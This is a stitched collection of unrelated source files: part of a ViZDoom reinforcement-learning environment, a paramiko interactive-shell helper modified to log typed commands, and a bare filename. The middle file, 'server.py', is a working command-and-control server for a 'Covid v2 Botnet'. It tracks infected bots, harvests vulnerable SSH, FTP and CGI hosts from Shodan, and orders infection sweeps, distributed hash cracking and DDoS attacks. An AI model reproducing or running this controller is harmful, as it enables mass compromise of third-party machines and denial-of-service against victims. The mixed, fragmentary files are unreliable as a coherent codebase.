This also has an advantage of working across completely independent process groups, e.g. different experiments.
"""
lock_filename = f'doom_{random.randrange(0, max_parallel):03d}.lockfile'
tmp_dir = project_tmp_dir()
lock_path = join(tmp_dir, lock_filename)
return lock_path
def key_to_action_default(key):
"""
MOVE_FORWARD
MOVE_BACKWARD
MOVE_RIGHT
MOVE_LEFT
SELECT_WEAPON1
SELECT_WEAPON2
SELECT_WEAPON3
SELECT_WEAPON4
SELECT_WEAPON5
SELECT_WEAPON6
SELECT_WEAPON7
ATTACK
SPEED
TURN_LEFT_RIGHT_DELTA
"""
from pynput.keyboard import Key
# health gathering
action_table = {
Key.left: 0,
Key.right: 1,
Key.up: 2,
Key.down: 3,
}
# action_table = {
# Key.up: 0,
# Key.down: 1,
# Key.alt: 6,
# Key.ctrl: 11,
# Key.shift: 12,
# Key.space: 13,
# Key.right: 'turn_right',
# Key.left: 'turn_left',
# }
return action_table.get(key, None)
class VizdoomEnv(gym.Env):
def __init__(self,
action_space,
config_file,
coord_limits=None,
max_histogram_length=200,
show_automap=False,
skip_frames=1,
async_mode=False,
record_to=None):
self.initialized = False
# essential game data
self.game = None
self.state = None
self.curr_seed = 0
self.rng = None
self.skip_frames = skip_frames
self.async_mode = async_mode
# optional - for topdown view rendering and visitation heatmaps
self.show_automap = show_automap
self.coord_limits = coord_limits
# can be adjusted after the environment is created (but before any reset() call) via observation space wrapper
self.screen_w, self.screen_h, self.channels = 640, 480, 3
self.screen_resolution = ScreenResolution.RES_640X480
self.calc_observation_space()
self.black_screen = None
# provided as a part of environment definition, since these depend on the scenario and
# can be quite complex multi-discrete spaces
self.action_space = action_space
self.composite_action_space = hasattr(self.action_space, 'spaces')
self.delta_actions_scaling_factor = 7.5
scenarios_dir = join(os.path.dirname(__file__), 'scenarios')
self.config_path = join(scenarios_dir, config_file)
self.variable_indices = self._parse_variable_indices(self.config_path)
# only created if we call render() method
self.viewer = None
# record full episodes using VizDoom recording functionality
self.record_to = record_to
self.is_multiplayer = False # overridden in derived classes
# (optional) histogram to track positional coverage
# do not pass coord_limits if you don't need this, to avoid extra calculation
self.max_histogram_length = max_histogram_length
self.current_histogram, self.previous_histogram = None, None
if self.coord_limits:
x = (self.coord_limits[2] - self.coord_limits[0])
y = (self.coord_limits[3] - self.coord_limits[1])
if x > y:
len_x = self.max_histogram_length
len_y = int((y / x) * self.max_histogram_length)
else:
len_x = int((x / y) * self.max_histogram_length)
len_y = self.max_histogram_length
self.current_histogram = np.zeros((len_x, len_y), dtype=np.int32)
self.previous_histogram = np.zeros_like(self.current_histogram)
# helpers for human play with pynput keyboard input
self._terminate = False
self._current_actions = []
self._actions_flattened = None
self._prev_info = None
self._last_episode_info = None
self._num_episodes = 0
self.mode = 'algo'
self.seed()
def seed(self, seed=None):
self.curr_seed = seeding.hash_seed(seed, max_bytes=4)
self.rng, _ = seeding.np_random(seed=self.curr_seed)
return [self.curr_seed, self.rng]
def calc_observation_space(self):
self.observation_space = gym.spaces.Box(0, 255, (self.screen_h, self.screen_w, self.channels), dtype=np.uint8)
def _set_game_mode(self, mode):
if mode == 'replay':
self.game.set_mode(Mode.PLAYER)
else:
if self.async_mode:
log.info('Starting in async mode! Use this only for testing, otherwise PLAYER mode is much faster')
self.game.set_mode(Mode.ASYNC_PLAYER)
else:
self.game.set_mode(Mode.PLAYER)
def _create_doom_game(self, mode):
self.game = DoomGame()
self.game.load_config(self.config_path)
self.game.set_screen_resolution(self.screen_resolution)
self.game.set_seed(self.rng.randint(0, 2**32 - 1))
if mode == 'algo':
self.game.set_window_visible(False)
elif mode == 'human' or mode == 'replay':
self.game.add_game_args('+freelook 1')
self.game.set_window_visible(True)
else:
raise Exception('Unsupported mode')
self._set_game_mode(mode)
def _game_init(self, with_locking=True, max_parallel=10):
lock_file = lock = None
if with_locking:
lock_file = doom_lock_file(max_parallel)
lock = FileLock(lock_file)
init_attempt = 0
while True:
init_attempt += 1
try:
if with_locking:
with lock.acquire(timeout=20):
self.game.init()
else:
self.game.init()
break
except Timeout:
if with_locking:
log.debug(
'Another process currently holds the lock %s, attempt: %d', lock_file, init_attempt,
)
except Exception as exc:
log.warning('VizDoom game.init() threw an exception %r. Terminate process...', exc)
from sample_factory.envs.env_utils import EnvCriticalError
raise EnvCriticalError()
def initialize(self):
self._create_doom_game(self.mode)
# (optional) top-down view provided by the game engine
if self.show_automap:
self.game.set_automap_buffer_enabled(True)
self.game.set_automap_mode(AutomapMode.OBJECTS)
self.game.set_automap_rotate(False)
self.game.set_automap_render_textures(False)
# self.game.add_game_args("+am_restorecolors")
# self.game.add_game_args("+am_followplayer 1")
background_color = 'ffffff'
self.game.add_game_args('+viz_am_center 1')
self.game.add_game_args('+am_backcolor ' + background_color)
self.game.add_game_args('+am_tswallcolor dddddd')
# self.game.add_game_args("+am_showthingsprites 0")
self.game.add_game_args('+am_yourcolor ' + background_color)
self.game.add_game_args('+am_cheat 0')
self.game.add_game_args('+am_thingcolor 0000ff') # player color
self.game.add_game_args('+am_thingcolor_item 00ff00')
# self.game.add_game_args("+am_thingcolor_citem 00ff00")
self._game_init()
self.initialized = True
def _ensure_initialized(self):
if not self.initialized:
self.initialize()
@staticmethod
def _parse_variable_indices(config):
with open(config, 'r') as config_file:
lines = config_file.readlines()
lines = [l.strip() for l in lines]
variable_indices = {}
for line in lines:
if line.startswith('#'):
continue # comment
variables_syntax = r'available_game_variables[\s]*=[\s]*\{(.*)\}'
match = re.match(variables_syntax, line)
if match is not None:
variables_str = match.groups()[0]
variables_str = variables_str.strip()
variables = variables_str.split(' ')
for i, variable in enumerate(variables):
variable_indices[variable] = i
break
return variable_indices
def _black_screen(self):
if self.black_screen is None:
self.black_screen = np.zeros(self.observation_space.shape, dtype=np.uint8)
return self.black_screen
def _game_variables_dict(self, state):
game_variables = state.game_variables
variables = {}
for variable, idx in self.variable_indices.items():
variables[variable] = game_variables[idx]
return variables
def demo_path(self, episode_idx):
demo_name = f'e{episode_idx:03d}.lmp'
demo_path = join(self.record_to, demo_name)
demo_path = os.path.normpath(demo_path)
return demo_path
def reset(self):
self._ensure_initialized()
if self.record_to is not None and not self.is_multiplayer:
# does not work in multiplayer (uses different mechanism)
if not os.path.exists(self.record_to):
os.makedirs(self.record_to)
demo_path = self.demo_path(self._num_episodes)
log.warning('Recording episode demo to %s', demo_path)
self.game.new_episode(demo_path)
else:
if self._num_episodes > 0:
# no demo recording (default)
self.game.new_episode()
self.state = self.game.get_state()
img = None
try:
img = self.state.screen_buffer
except AttributeError:
# sometimes Doom does not return screen buffer at all??? Rare bug
pass
if img is None:
log.error('Game returned None screen buffer! This is not supposed to happen!')
img = self._black_screen()
# Swap current and previous histogram
if self.current_histogram is not None and self.previous_histogram is not None:
swap = self.current_histogram
self.current_histogram = self.previous_histogram
self.previous_histogram = swap
self.current_histogram.fill(0)
self._actions_flattened = None
self._last_episode_info = copy.deepcopy(self._prev_info)
self._prev_info = None
self._num_episodes += 1
return np.transpose(img, (1, 2, 0))
def _convert_actions(self, actions):
"""Convert actions from gym action space to the action space expected by Doom game."""
if self.composite_action_space:
# composite action space with multiple subspaces
spaces = self.action_space.spaces
else:
# simple action space, e.g. Discrete. We still treat it like composite of length 1
spaces = (self.action_space, )
actions = (actions, )
actions_flattened = []
for i, action in enumerate(actions):
if isinstance(spaces[i], Discretized):
# discretized continuous action
# check discretized first because it's a subclass of gym.spaces.Discrete
# the order of if clauses here matters! DON'T CHANGE THE ORDER OF IFS!
continuous_action = spaces[i].to_continuous(action)
actions_flattened.append(continuous_action)
elif isinstance(spaces[i], gym.spaces.Discrete):
# standard discrete action
num_non_idle_actions = spaces[i].n - 1
action_one_hot = np.zeros(num_non_idle_actions, dtype=np.uint8)
if action > 0:
action_one_hot[action - 1] = 1 # 0th action in each subspace is a no-op
actions_flattened.extend(action_one_hot)
elif isinstance(spaces[i], gym.spaces.Box):
# continuous action
actions_flattened.extend(list(action * self.delta_actions_scaling_factor))
else:
raise NotImplementedError(f'Action subspace type {type(spaces[i])} is not supported!')
return actions_flattened
def _vizdoom_variables_bug_workaround(self, info, done):
"""Some variables don't get reset to zero on game.new_episode(). This fixes it (also check overflow?)."""
if done and 'DAMAGECOUNT' in info:
log.info('DAMAGECOUNT value on done: %r', info.get('DAMAGECOUNT'))
if self._last_episode_info is not None:
bugged_vars = ['DEATHCOUNT', 'HITCOUNT', 'DAMAGECOUNT']
for v in bugged_vars:
if v in info:
info[v] -= self._last_episode_info.get(v, 0)
def _process_game_step(self, state, done, info):
if not done:
observation = np.transpose(state.screen_buffer, (1, 2, 0))
game_variables = self._game_variables_dict(state)
info.update(self.get_info(game_variables))
self._update_histogram(info)
self._prev_info = copy.deepcopy(info)
else:
observation = self._black_screen()
# when done=True Doom does not allow us to call get_info, so we provide info from the last frame
info.update(self._prev_info)
self._vizdoom_variables_bug_workaround(info, done)
return observation, done, info
def step(self, actions):
"""
Action is either a single value (discrete, one-hot), or a tuple with an action for each of the
discrete action subspaces.
"""
if self._actions_flattened is not None:
# provided externally, e.g. via human play
actions_flattened = self._actions_flattened
self._actions_flattened = None
else:
actions_flattened = self._convert_actions(actions)
default_info = {'num_frames': self.skip_frames}
reward = self.game.make_action(actions_flattened, self.skip_frames)
state = self.game.get_state()
done = self.game.is_episode_finished()
observation, done, info = self._process_game_step(state, done, default_info)
return observation, reward, done, info
def render(self, mode='human'):
try:
img = self.game.get_state().screen_buffer
img = np.transpose(img, [1, 2, 0])
if mode == 'rgb_array':
return img
h, w = img.shape[:2]
render_w = 1280
if w < render_w:
render_h = int(render_w * h / w)
img = cv2.resize(img, (render_w, render_h))
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer(maxwidth=render_w)
self.viewer.imshow(img)
return img
except AttributeError:
return None
def close(self):
try:
if self.game is not None:
self.game.close()
except RuntimeError as exc:
log.warning('Runtime error in VizDoom game close(): %r', exc)
if self.viewer is not None:
self.viewer.close()
def get_info(self, variables=None):
if variables is None:
variables = self._game_variables_dict(self.game.get_state())
info_dict = {'pos': self.get_positions(variables)}
info_dict.update(variables)
return info_dict
def get_info_all(self, variables=None):
if variables is None:
variables = self._game_variables_dict(self.game.get_state())
info = self.get_info(variables)
if self.previous_histogram is not None:
info['previous_histogram'] = self.previous_histogram
return info
def get_positions(self, variables):
return self._get_positions(variables)
@staticmethod
def _get_positions(variables):
have_coord_data = True
required_vars = ['POSITION_X', 'POSITION_Y', 'ANGLE']
for required_var in required_vars:
if required_var not in variables:
have_coord_data = False
break
x = y = a = np.nan
if have_coord_data:
x = variables['POSITION_X']
y = variables['POSITION_Y']
a = variables['ANGLE']
return {'agent_x': x, 'agent_y': y, 'agent_a': a}
def get_automap_buffer(self):
if self.game.is_episode_finished():
return None
state = self.game.get_state()
map_ = state.automap_buffer
map_ = np.swapaxes(map_, 0, 2)
map_ = np.swapaxes(map_, 0, 1)
return map_
def _update_histogram(self, info, eps=1e-8):
if self.current_histogram is None:
return
agent_x, agent_y = info['pos']['agent_x'], info['pos']['agent_y']
# Get agent coordinates normalized to [0, 1]
dx = (agent_x - self.coord_limits[0]) / (self.coord_limits[2] - self.coord_limits[0])
dy = (agent_y - self.coord_limits[1]) / (self.coord_limits[3] - self.coord_limits[1])
# Rescale coordinates to histogram dimensions
# Subtract eps to exclude upper bound of dx, dy
dx = int((dx - eps) * self.current_histogram.shape[0])
dy = int((dy - eps) * self.current_histogram.shape[1])
self.current_histogram[dx, dy] += 1
def _key_to_action(self, key):
if hasattr(self.action_space, 'key_to_action'):
return self.action_space.key_to_action(key)
else:
return key_to_action_default(key)
def _keyboard_on_press(self, key):
from pynput.keyboard import Key
if key == Key.esc:
self._terminate = True
return False
action = self._key_to_action(key)
if action is not None:
if action not in self._current_actions:
self._current_actions.append(action)
def _keyboard_on_release(self, key):
action = self._key_to_action(key)
if action is not None:
if action in self._current_actions:
self._current_actions.remove(action)
# noinspection PyProtectedMember
@staticmethod
def play_human_mode(env, skip_frames=1, num_episodes=3, num_actions=None):
from pynput.keyboard import Listener
doom = env.unwrapped
doom.skip_frames = 1 # handled by this script separately
# noinspection PyProtectedMember
def start_listener():
with Listener(on_press=doom._keyboard_on_press, on_release=doom._keyboard_on_release) as listener:
listener.join()
listener_thread = Thread(target=start_listener)
listener_thread.start()
for episode in range(num_episodes):
doom.mode = 'human'
env.reset()
last_render_time = time.time()
time_between_frames = 1.0 / 35.0
total_rew = 0.0
while not doom.game.is_episode_finished() and not doom._terminate:
num_actions = 14 if num_actions is None else num_actions
turn_delta_action_idx = num_actions - 1
actions = [0] * num_actions
for action in doom._current_actions:
if isinstance(action, int):
actions[action] = 1 # 1 for buttons currently pressed, 0 otherwise
else:
if action == 'turn_left':
actions[turn_delta_action_idx] = -doom.delta_actions_scaling_factor
elif action == 'turn_right':
actions[turn_delta_action_idx] = doom.delta_actions_scaling_factor
for frame in range(skip_frames):
doom._actions_flattened = actions
_, rew, _, _ = env.step(actions)
new_total_rew = total_rew + rew
if new_total_rew != total_rew:
log.info('Reward: %.3f, total: %.3f', rew, new_total_rew)
total_rew = new_total_rew
state = doom.game.get_state()
verbose = True
if state is not None and verbose:
info = doom.get_info()
print(
'Health:', info['HEALTH'],
# 'Weapon:', info['SELECTED_WEAPON'],
# 'ready:', info['ATTACK_READY'],
# 'ammo:', info['SELECTED_WEAPON_AMMO'],
# 'pc:', info['PLAYER_COUNT'],
# 'dmg:', info['DAMAGECOUNT'],
)
time_since_last_render = time.time() - last_render_time
time_wait = time_between_frames - time_since_last_render
if doom.show_automap and state.automap_buffer is not None:
map_ = state.automap_buffer
map_ = np.swapaxes(map_, 0, 2)
map_ = np.swapaxes(map_, 0, 1)
cv2.imshow('ViZDoom Automap Buffer', map_)
if time_wait > 0:
cv2.waitKey(int(time_wait) * 1000)
else:
if time_wait > 0:
time.sleep(time_wait)
last_render_time = time.time()
if doom.show_automap:
cv2.destroyAllWindows()
log.debug('Press ESC to exit...')
listener_thread.join()
# noinspection PyProtectedMember
@staticmethod
def replay(env, rec_path):
doom = env.unwrapped
doom.mode = 'replay'
doom._ensure_initialized()
doom.game.replay_episode(rec_path)
episode_reward = 0
start = time.time()
while not doom.game.is_episode_finished():
doom.game.advance_action()
r = doom.game.get_last_reward()
episode_reward += r
log.info('Episode reward: %.3f, time so far: %.1f s', episode_reward, time.time() - start)
log.info('Finishing replay')
doom.close()
|
server.py
|
#!/usr/bin/python3
import socket
import threading
import time
import os
import subprocess
from hash_identify import *
import re
import attack_list
import local_network_attack
import json
import os
import signal
import shodan
from termcolor import colored
import pyfiglet
#configure:
API_KEY = "" #shodan api key
executable="executable to infect with"
wordlist_len=0# wordlist length
cnc_ip = "your cnc ip"
cnc_port = 8080 #your cnc ip port, default is 8080
#############################################################################
global bots
bots = []
global waiting
waiting = False
global cracking
cracking = False
global targets
targets=[]
logs = []
global local_attack_var
local_attack_var=None
global list_attack_var
list_attack_var = None
global serv
serv = None
global pid
pid = None
class bot(): #bot class to save in bots list
def __init__(self,addr,port,id_num,status=True):
self.addr = addr
self.port = port
self.id_num = id_num
self.status = status
@classmethod
def from_json(self,json_data):
return bot(json_data['addr'],json_data['port'],json_data['id_num'],False)
def setOnline(self):
self.status = True
def setOffline(self):
self.status = False
def to_string(self):
return "id: %s addr: %s port: %s status: %s" % (self.id_num,self.addr,self.port,self.status)
def dump(self):
return {'addr':self.addr,'port':self.port,'id_num':self.id_num}
########### utils ################################
def get_work(workers, leng=wordlist_len): #returns work array for workers length
res = leng / workers
start = 0
end = int(res)
lst = []
for i in range(workers):
to_append = [int(start),int(end)]
lst.append(to_append)
end += int(res)
start += int(res)
if (i == (workers - 1)):
if (lst[len(lst)-1][1] != leng):
lst.append([start,leng])
return lst
def waiting_cmd():
global waiting
if waiting:
print("\n>>> ",end = '')
def get_online_bots():
global bots
leng = 0
for bot in bots:
if bot.status == True:
leng +=1
return leng
def get_online_bots_lst():
global bots
ret = []
for bot in bots:
if bot.status == True:
ret.append(bot)
return ret
########### return messages analayze: ###############
def infected(message,conn,addr): #incoming infection
global bots
arr = message.split(" ")
port = int(arr[1])
addr = addr[0]
#addr,public_addr,port,id_num,status
print(colored(("new infection connection from: %s %s" % (addr,port)),'green'))
if not infectedip(addr,port):
b = bot(addr, port, len(bots))
bots.append(b)
conn.send(str(len(bots) -1).encode())
conn.close()
else:
for b in bots:
if b.addr == addr:
conn.send(str(b.id_num).encode())
conn.close()
b.setOnline()
return
conn.send("hey, too much".encode())
conn.close()
def analyze_scan(message,conn,addr):
print(message)
conn.close()
def pong(conn,addr):
conn.send("pong".encode())
conn.close()
########### commands: ###################
def show_targets(): #prints targets
global targets
index = 1
print(colored(("--------------%s targets:------------" % (len(targets))),'blue'))
for target in targets:
print(colored(("[%s] %s"%(index,target)),'blue'))
index +=1
def valid_ip(addr): #checks if the ip is valid
regex = '''^(25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(
25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(
25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)\.(
25[0-5]|2[0-4][0-9]|[0-1]?[0-9][0-9]?)$'''
return re.search(regex, addr)
def add_targets(): #gets ips to insert to targets
global targets
global waiting
waiting=True
addr = input("enter target ip or list of ips (ip,ip) \n>>> ")
if "," in addr:
try:
lst = addr.split(",")
for addr in lst:
if valid_ip(addr) and not infectedip(addr) and addr not in targets:
targets.append(addr)
else:
print(colored(("target %s is infected or not a real ip address..." % (addr)),'yello'))
except:
print(colored("invalid syntax of list",'red'))
else:
if not infectedip(addr) and valid_ip(addr) and addr not in targets:
targets.append(addr)
else:
print(colored("target %s is infected or not a real ip address...",'yellow') % (addr))
show_targets()
def clean_targets(): #deletes targets
global targets
res = input("there are %s targets, you sure you want to remove them? [Y/n]")
if res.lower() == 'n':
return
targets = []
def search_targets(): #shodan targets search
global targets
global bots
try:
api = shodan.Shodan(API_KEY)
query = "ssh port:22"
result = api.search(query)
ip_list = []
for service in result['matches']:
ip_list.append(service['ip_str'])
query = "vsftpd 2.3 port:21"
result = api.search(query)
for service in result['matches']:
ip_list.append(service['ip_str'])
query = "http cgi port:80"
result = api.search(query)
for service in result['matches']:
ip_list.append(service['ip_str'])
for ip in targets:
if ip in ip_list:
ip_list.remove(ip)
for bot in bots:
if bot.public_addr in ip_list:
ip_list.remove(bot.public_addr)
inp = input("Found %s new targets, do you want to add them? [Y/n]" % len(ip_list))
if inp == "n":
return
targets = ip_list
except Exception as e:
print("error: %s" % str(e))
return
def infectedip(addr,port=0): #check if ip is infected
global bots
for bot in bots:
if port==0:
return bot.addr == addr
if bot.addr == addr and bot.port == port:
return True
return False
def ping(bot): #send ping to a bot
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((bot.addr, bot.port))
sock.settimeout(5.0)
sock.send("ping".encode())
data = sock.recv(1024)
sock.close()
msg = data.decode('utf-8').strip('\r\n')
if msg == "pong":
return True
else:
return False
except:
return False
def check_alive(): #pinging bots to check who is alive
global bots
for i in bots:
print(colored(("\n[*] checking bot %s" % (i.to_string())),'yellow'))
if not ping(i):
print(colored(("[-] bot offline %s" % (i.to_string())),'red'))
i.setOffline()
else:
print(colored(("[+] bot online %s" % (i.to_string())),'green'))
i.setOnline()
def bots_status(): #prints bots list
global bots
if not bots:
return colored("\n[-] no bots :( ... \n",'yellow')
l = colored('\n---bots:\n','blue')
for i in bots:
l += colored(("[+] %s" % (i.to_string())),'blue')
l += colored('\n','blue')
return l
def help(): #prints help message
menu = colored('\n--menu:\n','green')
menu += colored("[+] {status}: show bots status\n",'green')
menu += colored("[+] {update}: pings each bot and checks for status\n",'green')
menu += colored("[+] {show targets}: shows the target list \n",'green')
menu += colored("[+] {add targets}: add targets to the target list \n",'green')
menu += colored("[+] {search targets}: searches targets from shodan\n",'green')
menu += colored("[+] {clear targets}: clears the target list \n",'green')
menu += colored("[+] {crack}: uses the bots to crack a hash\n",'green')
menu += colored("[+] {ddos}: uses the bots to ddos a given ip\n",'green')
menu += colored("[+] {list attack}: give bots and server (if selected so) targets from target list to attack\n",'green')
menu += colored("[+] {stop list attack}: commands the bots and server to stop running list attack \n",'green')
menu += colored("[+] {local attack}: sends bots and server (if selected so) command to attack all ips on local network\n",'green')
menu += colored("[+] {stop local attack}: commands the bots and server to stop running local attack \n",'green')
menu += colored("[+] {exit()}: closes server, saves the target list and bots list\n",'green')
menu += colored("[+] {help}: print this menu\n",'green')
return menu
def crack(): #start hash cracking
global bots
global cracking
global waiting
if cracking:
print("a cracking progress is still on, wait for it ti finish")
return
check_alive()
workers_len = get_online_bots()
if workers_len == 0:
print("no bots online")
return
waiting=True
hash_str = input("enter a hash to crack \n>>> ")
res = check_hash(hash_str)
if "hash not avialbe" in res:
print(res)
return
print("possible hashes:")
for i in range(len(res)):
print("[%s] %s" % (i+1,res[i]))
while True:
hash_type = input("enter a hash number or different hash name (enter exit to exit) \n>>> ")
if hash_type == "exit":
return
if len(hash_type) == 1:
if ord(hash_type) >= 48 and ord(hash_type) <= 57 and ((ord(hash_type) - 49) < len(res)) and ((ord(hash_type) - 49) >= 0):
hash_type = res[ord(hash_type) - 49]
if not hash_type in hashlib.algorithms_available:
print("hash not avialbe or index out of range")
else:
break
print("chosen type:",hash_type)
cracking = True
job = get_work(workers_len)
for i in range(workers_len):
cmd = "crack %s %s %s %s" % (hash_str, hash_type,job[i][0], job[i][1])
send_message(bots[i],cmd)
def stop_cracking():
global bots
global cracking
for bot in bots:
send_message(bot, "stop crack")
cracking = False
def local_attack(): #handeling local attack
global local_attack_var
inpt = input("including me? [N/y]")
include = False
if inpt.lower() == 'y':
if local_attack_var:
if local_attack_var.status:
print(colored("im attacking right now... ",'yellow'))
else:
include=True
else:
include = True
check_alive()
global bots
for bot in bots:
send_message(bot,"local attack")
if include:
local_attack_var = local_network_attack
x = threading.Thread(target=local_attack_var.scan_and_attack, args=(cnc_ip,cnc_port,executable,True,False,"server"))
x.setDaemon(True)
x.start()
def stop_local_attack():
check_alive()
global bots
global local_attack_var
if local_attack_var:
local_attack_var.stop()
for bot in bots:
send_message(bot,"stop local attack")
def list_attack(): #give bots targets to attack from the list
global targets
global bots
global list_attack_var
check_alive()
workers_len = get_online_bots()
include=False
if len(targets) <=0:
print(colored("WTF no targets! add some targets!",'red'))
return
inpt = input("including me? [N/y]")
if inpt.lower() == 'y':
if list_attack_var:
if list_attack_var.status:
print(colored("im attacking right now... ",'yellow'))
else:
workers_len += 1
include=True
else:
workers_len += 1
include=True
if workers_len <= 0:
print(colored("no attack can be done because there are no workers!",'red'))
return
if len(targets) <= workers_len:
leng = len(targets)
if include:
leng -=1
index = 0
if bots != []:
for i in targets:
if bots[index].status:
send_message(bots[index],"list attack %s" % i)
index +=1
if index >= len(targets):
return
if include:
list_attack_var=attack_list
x = threading.Thread(target=list_attack_var.attack_list, args=(targets[len(targets) -1 ],cnc_ip,cnc_port,executable,False,False,"server"))
x.setDaemon(True)
x.start()
else:
job = get_work(workers_len,len(targets))
leng = len(job)
ret = get_online_bots_lst()
if include:
leng -=1
for i in range(leng):
lst_to_send = []
for j in range(job[i][0],job[i][1]):
lst_to_send.append(targets[j])
index = i
send_message(ret[i],"list attack %s" % (','.join(lst_to_send)))
if include:
lst_to_send=[]
for i in range(job[leng][0],job[leng][1]):
lst_to_send.append(targets[i])
list_attack_var = attack_list
x = threading.Thread(target=list_attack_var.attack_list, args=(lst_to_send,cnc_ip,cnc_port,executable,False,False,"server"))
x.setDaemon(True)
x.start()
targets = []
def stop_list_attack():
global bots
for bot in bots:
send_message(bot,"stop list attack")
global list_attack_var
if list_attack_var:
list_attack_var.stop()
def ddos(): #sends bots to start ddos attack on spesific ip
global bots
target = input("[*] enter the ip you want to KILL: ",)
if valid_ip(target):
check_alive()
for bot in bots:
send_message(bot,"ddos %s" % target)
else:
print(color("[-] ERROR: not a valid ip!",'red'))
def stop_ddos():
global bots
check_alive()
for bot in bots:
send_message(bot,"stop ddos")
print(colored("[+] sent the bots stop command",'green'))
############## server settings: ####################
def send_message(bot, msg): #sends message to a given bot
if bot.status == True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((bot.addr, bot.port))
sock.send(msg.encode())
sock.close()
except:
print(colored("[-] error sending message %s to bot %s" % (msg, bot.id_num)),'red')
def on_message(message,conn,addr): #handle new message
print(colored(("\n\n[+] got message %s %s %s" % (message,"from",addr)),'blue'))
if message.startswith("infected:"):
infected(message,conn,addr)
elif message.startswith("scan resaults:"):
analyze_scan(message,conn,addr)
elif message.startswith("cracked"):
stop_cracking()
elif message == "ping":
pong(conn,addr)
else:
pass
waiting_cmd()
def listening_loop(serv): #loop to recive new messages
while True:
conn, addr = serv.accept()
data = conn.recv(1024)
if not data:
break
msg = data.decode('utf-8').strip('\r\n')
x = threading.Thread(target=on_message, args=(msg,conn,addr))
x.start()
def listen(): #starts the cnc server and simplehttpserver
global serv
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serv.bind((cnc_ip, cnc_port))
serv.listen(1)
res = pyfiglet.figlet_format("Covid v2 Botnet",font = "slant")
print(colored(res,'green'))
print(colored(("[+] started a new server on: %s %s" % (serv.getsockname()[0], serv.getsockname()[1])),'green'))
PORT = 80
devnull = open(os.devnull, 'w')
pro = subprocess.Popen(["python","-m","SimpleHTTPServer",str(PORT),">","/dev/null", "2>&1"],stdout=devnull,stderr=devnull)
global pid
pid = pro.pid
print(colored(("[+] started the simple http server at port %s" % PORT),'green'))
x = threading.Thread(target=listening_loop, args=(serv,))
x.setDaemon(True)
x.start()
def load_targets(): #loads targets from targets.json
global targets
try:
with open("targets.json",'r',encoding='utf-8') as f:
data = json.loads(f.read())
for i in data:
targets.append(i)
print(colored(('[+] loaded %s targets'%len(targets)),'green'))
except:
print(colored("[-] error in loading targets",'yellow'))
def save_targets(): #saves targets to targets.json
global targets
try:
with open("targets.json",'w') as f:
json.dump(targets,f)
print(colored('[+] saved targets','green'))
except:
print(colored('[-] error in saving targets','red'))
def load_bots(): #loads bots from bots.json
global bots
try:
with open("bots.json",'r',encoding='utf-8') as f:
data = json.loads(f.read())
for i in data:
bots.append(bot.from_json(i))
check_alive()
print(colored(('[+] bots online: %s'%get_online_bots()),'green'))
except:
print(colored("[-] error in loading bots",'yellow'))
def save_bots(): #saves bots to bots.json
global bots
try:
with open("bots.json",'w') as f:
json.dump([o.dump() for o in bots],f)
print(colored(("[+] saved %s bots" %len(bots)),'green'))
except:
print(colored('[-] error saving bots!','red'))
############## main controller: ####################3
def main():
global waiting
listen() $ #start server
load_bots()
load_targets()
while True:
waiting = True
command = input("whats your next command :} ? (type help for menu) \n>>> ")
if len(command) > 1:
waiting = False
if command == "help":
print(help())
elif command == "status":
print(bots_status())
elif command == "update":
check_alive()
print(bots_status())
elif command == "crack":
crack()
elif command == "stop crack":
stop_cracking()
elif command == "show targets":
show_targets()
elif command == "add targets":
add_targets()
elif command == "local attack":
local_attack()
elif command == "stop local attack":
stop_local_attack()
elif command == "list attack":
list_attack()
elif command == "stop list attack":
stop_list_attack()
elif command == "search targets":
search_targets()
elif command == "clean targets":
clean_targets()
elif command == "ddos":
ddos()
elif command == "stop ddos":
stop_ddos()
elif command == "exit()":
save_bots()
save_targets()
global serv
serv.close()
global pid
os.killpg(os.getpgid(pid), signal.SIGTERM)
exit()
main()
|
interactive.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
import socket
import sys
import time
from paramiko.py3compat import u
# windows does not have termios...
try:
import termios
import tty
has_termios = True
except ImportError:
has_termios = False
def interactive_shell(chan):
if has_termios:
posix_shell(chan)
else:
windows_shell(chan)
def posix_shell(chan):
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
#记录命令输入
records = []
f = file('record.log','ab+')
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
#下面为修改部分
if x =='\r':
ftime = time.strftime('%Y-%m-%d %H:%M:%S')
cmd = ''.join(records).replace('\r', '\n')
log = '%s : %s' %(ftime,cmd)
f.write(log)
records = []
if len(x) == 0:
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
f.close()
# thanks to Mike Looijmans for this code
def windows_shell(chan):
import threading
sys.stdout.write("Line-buffered terminal emulation. Press F6 or ^Z to send EOF.\r\n\r\n")
def writeall(sock):
while True:
data = sock.recv(256)
if not data:
sys.stdout.write('\r\n*** EOF ***\r\n\r\n')
sys.stdout.flush()
break
sys.stdout.write(data)
sys.stdout.flush()
writer = threading.Thread(target=writeall, args=(chan,))
writer.start()
try:
while True:
d = sys.stdin.read(1)
if not d:
break
chan.send(d)
except EOFError:
# user hit ^Z or F6
pass
|
test_ffi.py
|
